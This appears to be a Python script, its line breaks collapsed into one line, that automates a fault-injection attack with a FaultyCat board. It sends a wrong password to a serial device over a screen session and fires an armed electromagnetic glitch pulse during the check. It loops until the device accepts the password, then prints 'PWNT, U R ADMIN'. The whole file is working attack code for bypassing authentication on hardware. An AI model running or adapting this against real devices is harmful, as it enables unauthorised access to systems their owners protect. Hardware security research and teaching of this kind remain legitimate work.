import sys import time import pexpect # Required to handle screen sessions import threading from Modules import Worker DEFAULT_COMPORT = "/dev/ttyACM0" SCREEN_NAME = "ttyUSB0_screen" # Replace this with the actual screen session name # Initialize the FaultyWorker faulty_worker = Worker.FaultyWorker() # Shared variable to store the response from the device device_response = None child = None # Global child variable def initialize_child(): """Initialize the global child process for the screen session.""" global child child = pexpect.spawn(f'screen -x {SCREEN_NAME}', encoding='utf-8') child.expect(pexpect.TIMEOUT, timeout=1) # Clear out any pre-existing buffer def send_test_message_and_read_response(): """Send 'ping' via screen to a serial device and check for 'correct!\\n' or 'incorrect\\n'.""" global child # Send 'ping' to the screen session child.sendline("ping") sys.stdout.write("\rSent 'ping' to screen session.") sys.stdout.flush() # Wait a bit to ensure the command is processed time.sleep(0.5) # Try reading any new output from the screen session try: response = child.read_nonblocking(size=1024, timeout=2) # Read up to 1024 bytes of new data if "pong" in response: sys.stdout.write("\rReceived 'pong' response.") return True else: sys.stdout.write(f"\rReceived unexpected response: {response}") sys.stdout.flush() except pexpect.exceptions.TIMEOUT: sys.stdout.write("\rNo response received from the screen session (timeout).") sys.stdout.flush() return False def read_screen_output(): """Read output from the screen session in a separate thread.""" global device_response buffer = "" # Initialize a buffer to store incoming characters try: while True: response = child.read_nonblocking(size=1024, timeout=2) # Read up to 1024 bytes of new data buffer += response # Append the new response to the buffer # Check if there's a complete line in the buffer while "\n" in buffer: line, buffer = buffer.split("\n", 1) # Split the buffer at the first newline line = line.strip() # Remove any leading/trailing whitespace # Check for specific responses if "incorrect!" in line: #sys.stdout.write("\rReceived 'incorrect' response.") device_response = 'incorrect' return # Exit the loop on incorrect response elif "correct" in line: # Die here: Echo message, disarm device, and kill the program sys.stdout.write("\nReceived 'correct' response.\n PWNT, U R ADMIN\n Disarming the device and exiting...\n") sys.stdout.flush() # Disarm the board faulty_worker.board_uart.send(faulty_worker.board_configurator.board_commands.COMMAND_DISARM.value.encode("utf-8")) faulty_worker.board_uart.close() # Exit the program sys.exit(0) else: sys.stdout.write(f"\rReceived unexpected response: {line}") sys.stdout.flush() except pexpect.exceptions.TIMEOUT: sys.stdout.write("\rNo response received from the screen session (timeout).") sys.stdout.flush() except Exception as e: sys.stdout.write(f"\rError reading from screen session: {e}") sys.stdout.flush() def send_pulse_and_check_response(): """Send a pulse and check for 'correct!\\n' or 'incorrect\\n' response in parallel.""" global device_response try: # Wait a bit to ensure the command is processed # Send 'incorrectPassword' command to the screen session sys.stdout.write("\rSending 'incorrectPassword' to screen session.") sys.stdout.flush() child.sendline("incorrectPassword") time.sleep(0.35) # Send 'pulse' command (simulating the pulse trigger) faulty_worker.board_uart.send(faulty_worker.board_configurator.board_commands.COMMAND_PULSE.value.encode("utf-8")) sys.stdout.write("\rSent pulse...") sys.stdout.flush() # Start a thread to read the screen output reader_thread = threading.Thread(target=read_screen_output) reader_thread.start() # Wait for the reading thread to complete reader_thread.join() except Exception as e: sys.stdout.write(f"\rError interacting with screen session during pulse: {e}") sys.stdout.flush() return False def start_faulty_attack(): """Send a pulse through the FaultyCat and listen for the response concurrently.""" global child try: # Initialize the child process for screen session initialize_child() # Open FaultyCat connection faulty_worker.board_uart.open() time.sleep(0.1) sys.stdout.write("\rBoard connected.\n") sys.stdout.flush() # Arming the board sys.stdout.write("\r[*] ARMING BOARD, BE CAREFUL!\n") sys.stdout.flush() faulty_worker.board_uart.send(faulty_worker.board_configurator.board_commands.COMMAND_DISARM.value.encode("utf-8")) time.sleep(1) faulty_worker.board_uart.send(faulty_worker.board_configurator.board_commands.COMMAND_ARM.value.encode("utf-8")) sys.stdout.write("\r[*] ARMED BOARD.\n") sys.stdout.flush() time.sleep(1) # Sending pulses and checking responses in a loop (up to 5 times) max_iterations = 5 for i in range(max_iterations): sys.stdout.write(f"\rLoop {i+1}/{max_iterations}: Sending pulse and checking response.\n") sys.stdout.flush() # Send the test message and check for pong if send_test_message_and_read_response(): max_iterations_2 = 3 for j in range(max_iterations_2): # Send pulse and check for correct/incorrect response if send_pulse_and_check_response(): break # Break the loop if 'correct!' is received # Small delay before next iteration time.sleep(1) # Disarm the board sys.stdout.write("\rDISARMING BOARD. \n") sys.stdout.flush() faulty_worker.board_uart.send(faulty_worker.board_configurator.board_commands.COMMAND_DISARM.value.encode("utf-8")) faulty_worker.board_uart.close() sys.stdout.write("\rBOARD DISARMED.\n") sys.stdout.flush() except Exception as e: sys.stdout.write(f"\rError: {e}\n") sys.stdout.flush() finally: # Make sure to clean up the child process if child: child.close() def faulty(): """Configure and send pulses through the FaultyCat.""" comport = DEFAULT_COMPORT print("Configuring the FaultyCat...") print(f"Using serial port: {comport}") # Set the serial port faulty_worker.set_serial_port(comport) # Validate the serial connection if not faulty_worker.validate_serial_connection(): print(f"Error: Could not establish connection on: {comport}") return # Start the faulty attack (send pulse) start_faulty_attack() if __name__ == "__main__": print("Starting FaultyCat...") faulty()